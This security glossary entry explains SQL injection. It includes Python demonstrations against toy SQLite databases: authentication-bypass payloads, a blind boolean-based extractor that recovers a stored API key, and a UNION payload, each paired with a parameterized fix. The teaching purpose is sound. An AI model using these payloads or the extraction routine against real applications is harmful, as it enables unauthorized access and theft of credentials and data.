SQL Injection (SQLi) — Executing Unauthorized Database Queries

SQL Injection (SQLi) is a vulnerability that allows attackers to manipulate database queries by injecting malicious input into application fields. This SECMONS glossary entry explains how SQL injection works, common impact scenarios, and how defenders should mitigate and detect it.

What Is SQL Injection (SQLi)? 🧠

SQL Injection (SQLi) is a vulnerability that occurs when untrusted user input is improperly incorporated into database queries, allowing attackers to execute unintended SQL commands.

It is formally classified as CWE-89 — Improper Neutralization of Special Elements used in an SQL Command under the /glossary/cwe/ taxonomy.

When a SQL injection flaw in a publicly distributed product is disclosed, it typically receives a /glossary/cve/ identifier and is scored via /glossary/cvss/. Flaws in an organisation's own custom applications, which make up most real-world SQLi, are tracked internally rather than through CVE.


How SQL Injection Works 🔎

A vulnerable application builds database queries dynamically by concatenating user input into the SQL text instead of binding it as a parameter, so the input can change the structure of the query rather than only the data it compares against.

For example:

  • A login form concatenates the submitted username and password directly into an SQL statement.
  • An attacker supplies crafted input, typically a quote character followed by extra SQL or a comment marker, that alters the query logic.
  • The database parses and executes the modified query as if the application had written it.
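
The login-form flow above, as an added example (not code from the SECMONS entry): a constructed in-memory SQLite users table, a login function that concatenates user input into the query, the same query with bound parameters, and the classic `admin'--` and `' OR '1'='1` payloads run against both. The table, its rows and the function names are assumptions made for the demonstration.

```python
import sqlite3


def setup_db():
    """Constructed sample data: an in-memory SQLite users table.
    Plaintext passwords are used only to keep the demo short; a real
    application stores a salted password hash."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("admin", "s3cr3t-admin", "admin"), ("alice", "alice-pw", "user")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Step 1 of the flow above: user input is pasted into the SQL text, so
    quote characters and comment markers in the input change the query."""
    sql = (
        "SELECT username, role FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(sql).fetchone()  # (username, role) or None


def login_parameterized(conn, username, password):
    """Hardened form: the SQL text is fixed and the values are bound through
    placeholders, so the database never parses the input as SQL."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


# Two classic authentication-bypass payloads:
#   username "admin'--"      closes the string and comments out the password check
#   password "' OR '1'='1"   turns the WHERE clause into (... AND password='') OR true
BYPASS_PAYLOADS = [
    ("admin'--", "wrong-password"),
    ("nobody", "' OR '1'='1"),
]


def run_demo():
    """Runs every payload through both functions; returns
    {(username, password): (vulnerable_result, parameterized_result)}."""
    conn = setup_db()
    results = {}
    for username, password in BYPASS_PAYLOADS:
        results[(username, password)] = (
            login_vulnerable(conn, username, password),
            login_parameterized(conn, username, password),
        )
    return results


if __name__ == "__main__":
    for (u, p), (vuln, safe) in run_demo().items():
        print(f"username={u!r} password={p!r}")
        print(f"  vulnerable query returned:    {vuln}")
        print(f"  parameterized query returned: {safe}")
```

The vulnerable function logs the attacker in as admin with both payloads; the parameterized one returns no row for either, because `admin'--` is compared literally against the username column and the quote in the second payload never reaches the SQL parser.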

Common exploitation outcomes include:

  • Authentication bypass
  • Data extraction
  • Data modification
  • Account takeover
  • Data destruction (dropped tables or deleted records)

In certain environments, SQL injection also leads to operating system command execution, for example through database features such as Microsoft SQL Server's xp_cmdshell or file-write primitives that drop a web shell on the server, escalating into /glossary/remote-code-execution/.


Why SQL Injection Is Dangerous 🎯

SQL injection directly targets backend databases, which often store:

  • User credentials
  • Personal information
  • Payment data
  • Internal application logic
  • Administrative configuration

Because databases frequently contain sensitive information, SQL injection can result in large-scale data breaches documented under /breaches/.

In some cases, SQL injection also becomes a form of /glossary/initial-access/ when exposed services are internet-facing.


Types of SQL Injection 🔬

Type               Description
----               -----------
In-band SQLi       Data is returned in the application's normal response; the error-based and UNION-based variants belong here
Blind SQLi         No data is echoed back; the attacker infers it from a true/false difference in response behaviour (boolean-based)
Time-based SQLi    A blind variant: data is inferred from delays the attacker injects into query execution
Out-of-band SQLi   Data is exfiltrated through a separate channel, such as DNS or HTTP requests that the database is made to issue

Each variation depends on how the application processes input and returns responses.
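
An added example of the blind, boolean-based row in the table above (not part of the SECMONS entry): a constructed SQLite schema with a product-lookup endpoint that reveals only whether a row matched, and an attacker routine that turns that single bit per request into a full secret from another table, first its length, then each character by binary search over printable ASCII. The schema, the secret and the endpoint are assumptions. It goes beyond the table by counting the requests needed, which is what makes the technique practical; a time-based variant would replace the true/false difference with an injected delay (SQLite has no sleep function, so that is not shown).

```python
import sqlite3

# Constructed secret the attacker wants; the products endpoint never returns it.
ASSUMED_SECRET = "K3Y-42"


def setup_db():
    """Constructed sample data: a public products table and a users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, public INTEGER)")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, api_key TEXT)")
    conn.executemany("INSERT INTO products (name, public) VALUES (?, ?)",
                     [("widget", 1), ("gadget", 1)])
    conn.execute("INSERT INTO users (username, api_key) VALUES (?, ?)",
                 ("admin", ASSUMED_SECRET))
    return conn


def product_exists_vulnerable(conn, product_id):
    """Vulnerable lookup: product_id is interpolated into the SQL and the caller
    learns only True/False, which is the entire side channel for blind SQLi."""
    sql = f"SELECT id FROM products WHERE public = 1 AND id = {product_id}"
    return conn.execute(sql).fetchone() is not None


def product_exists_safe(conn, product_id):
    """Hardened lookup: the id is bound as a parameter, so an injected condition
    is compared as a literal string against an integer column and matches nothing."""
    return conn.execute(
        "SELECT id FROM products WHERE public = 1 AND id = ?", (product_id,)
    ).fetchone() is not None


class BlindExtractor:
    """Drives the boolean oracle to read a scalar subquery character by character."""

    # Subquery naming the value to extract; chosen by the attacker.
    TARGET = "(SELECT api_key FROM users WHERE username = 'admin')"

    def __init__(self, conn, lookup=product_exists_vulnerable):
        self.conn = conn
        self.lookup = lookup
        self.requests = 0  # one oracle call corresponds to one HTTP request in practice

    def oracle(self, condition):
        self.requests += 1
        # A valid id (1) keeps the base query true; the injected condition
        # alone decides whether the row comes back.
        return self.lookup(self.conn, f"1 AND ({condition})")

    def secret_length(self, max_len=64):
        for n in range(0, max_len + 1):
            if self.oracle(f"length({self.TARGET}) = {n}"):
                return n
        raise ValueError("length not found: oracle is silent or secret exceeds max_len")

    def extract(self, max_len=64):
        length = self.secret_length(max_len)
        chars = []
        for pos in range(1, length + 1):
            # Binary search the code point over printable ASCII (32..126):
            # at most 7 requests per character instead of up to 95.
            lo, hi = 32, 126
            while lo < hi:
                mid = (lo + hi) // 2
                if self.oracle(f"unicode(substr({self.TARGET}, {pos}, 1)) <= {mid}"):
                    hi = mid
                else:
                    lo = mid + 1
            chars.append(chr(lo))
        return "".join(chars)


if __name__ == "__main__":
    ex = BlindExtractor(setup_db())
    print(f"recovered {ex.extract()!r} in {ex.requests} requests")
```

Run against the parameterized lookup, the same extractor gets False for every probe and gives up at the length step: with the id bound as data, `1 AND (...)` is just a string that equals no product id.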


SQL Injection vs Other Injection Attacks 🔄

Vulnerability          Target
-------------          ------
SQL Injection          Database queries
Command Injection      Operating system commands
LDAP Injection         Directory services
Cross-Site Scripting   Browser execution context

All injection flaws share a common root cause: untrusted data is mixed into a command or query that a downstream interpreter parses, so the interpreter cannot tell where the application's instructions end and the attacker's data begins. The fix is to keep the two separate (parameter binding, structured APIs, context-aware encoding), not to rely on sanitizing the input.


Defensive Considerations 🛡️

Preventing SQL injection requires, in order of effectiveness:

  • Parameterized queries (prepared statements) for every user-supplied value; this is the primary control because it keeps data out of the SQL text
  • Allowlist validation for anything that cannot be bound as a parameter, such as table and column names or sort directions
  • Input validation on type and format as defense in depth, not as a substitute for parameterization
  • Least privilege database accounts (no administrative rights, no file or OS-command features, read-only where possible) to limit what a successful injection can reach
  • Web application firewalls (WAF) as a detection and virtual-patching layer; a WAF can be bypassed and does not fix the code
  • Secure coding practices, including ORMs or query builders used without falling back to string concatenation
  • Regular security testing, both static analysis for string-built queries and dynamic testing of inputs
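
An added example for the defensive list above (not code from the SECMONS entry) showing where the first three controls apply: a product listing that takes a numeric price filter and a sort column. The value is type-checked and bound as a parameter; the sort column is an identifier, which placeholders cannot bind, so it is mapped through an allowlist. Against the vulnerable version the unquoted numeric slot also carries an in-band UNION payload that pulls rows from an unrelated table straight into the normal response. Schema, table names and data are assumptions.

```python
import sqlite3

# Identifiers cannot be bound as parameters, so the hardened code maps
# user-supplied sort options onto a fixed allowlist of column names.
ALLOWED_SORT_COLUMNS = {"name", "price"}
ALLOWED_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def setup_db():
    """Constructed sample data: a products table plus a users table that
    the listing endpoint has no business reading."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL)")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, api_key TEXT)")
    conn.executemany("INSERT INTO products (name, price) VALUES (?, ?)",
                     [("widget", 10.0), ("gadget", 25.0)])
    conn.execute("INSERT INTO users (username, api_key) VALUES (?, ?)", ("admin", "K3Y-42"))
    return conn


def list_products_vulnerable(conn, min_price, sort_by):
    """Both the value and the identifier are interpolated into the SQL text."""
    sql = f"SELECT name, price FROM products WHERE price >= {min_price} ORDER BY {sort_by}"
    return conn.execute(sql).fetchall()


def list_products_hardened(conn, min_price, sort_by, direction="asc"):
    """Value: type-checked, then bound. Identifiers: allowlist lookup only."""
    try:
        min_price = float(min_price)  # input validation: anything non-numeric is rejected
    except (TypeError, ValueError):
        raise ValueError(f"min_price must be numeric, got {min_price!r}") from None
    if sort_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"unsupported sort column {sort_by!r}")
    try:
        direction_sql = ALLOWED_DIRECTIONS[str(direction).lower()]
    except KeyError:
        raise ValueError(f"unsupported sort direction {direction!r}") from None
    # Only allowlisted constants reach the SQL text; the value travels as a bound parameter.
    sql = f"SELECT name, price FROM products WHERE price >= ? ORDER BY {sort_by} {direction_sql}"
    return conn.execute(sql, (min_price,)).fetchall()


# In-band (UNION-based) payload: the numeric slot is unquoted, so the attacker
# appends a second SELECT with the same column count and reads users.api_key
# out of the ordinary product listing.
UNION_PAYLOAD = "0 UNION SELECT username, api_key FROM users"


if __name__ == "__main__":
    conn = setup_db()
    print("vulnerable:", list_products_vulnerable(conn, UNION_PAYLOAD, "name"))
    print("hardened:  ", list_products_hardened(conn, "5", "price", "desc"))
    for bad in [(UNION_PAYLOAD, "name"), ("0", "name; DROP TABLE users")]:
        try:
            list_products_hardened(conn, *bad)
        except ValueError as e:
            print("rejected:  ", e)
```

The vulnerable listing returns `("admin", "K3Y-42")` alongside the products; the hardened one raises on the UNION payload at the numeric check and on the bogus sort column at the allowlist, and never builds SQL from either. Pair this with a database account that cannot read `users` at all, so that even a missed code path yields nothing.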

If a SQL injection vulnerability is confirmed as /glossary/exploited-in-the-wild/ or included in /glossary/known-exploited-vulnerabilities-kev/, remediation must be immediate.

Operational mitigation guidance is typically documented under:


Why SECMONS Tracks SQL Injection Carefully 📌

Despite being one of the oldest web vulnerabilities, SQL injection remains a recurring cause of major data breaches.

Clear classification and structured explanation ensure that readers understand both the technical mechanics and operational impact.


Authoritative References 📎